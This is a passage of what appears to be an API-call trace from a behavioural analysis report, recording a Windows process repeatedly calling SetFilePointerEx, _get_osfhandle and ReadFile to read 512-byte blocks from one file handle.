dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 
[0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.574] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.574] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
